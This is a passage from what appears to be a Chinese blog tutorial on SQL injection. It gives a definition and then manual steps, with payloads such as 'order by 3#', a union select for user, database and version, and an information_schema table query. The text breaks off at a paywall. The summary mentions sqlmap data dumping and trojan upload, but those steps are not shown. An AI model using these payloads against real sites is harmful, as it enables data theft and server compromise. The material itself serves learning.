这篇博客详细介绍了SQL注入的概念,通过手工注入和使用sqlmap工具进行演示。手工注入步骤包括找到漏洞链接、获取列长度、联合查询等。在sqlmap工具注入部分,展示了如何利用sqlmap自动化获取数据库信息、导出数据、上传木马文件并控制服务器的过程。
什么是SQL注入:所谓SQL注入就是通过把SQL命令插入到Web表单提交或输入域名或页面请求查询的字符串,最终达到欺骗服务器执行恶意的SQL命令,假如管理员没有对id参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询.
手工注入
第一步找到漏洞链接
第二步获取列长度 说明目前使用的数据库表格只有3列
order by 3#
第三步使用联合查询从而获当前用户和数据名与数据库版本
union select user(),database(),version()#
第四步查询所有表格,我们已经知道目前所使用的数据库名是zkpy接下来我们查询表格名字
union select 1,2,table_name from information_schema.tables where table_schema='zkpy'#
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
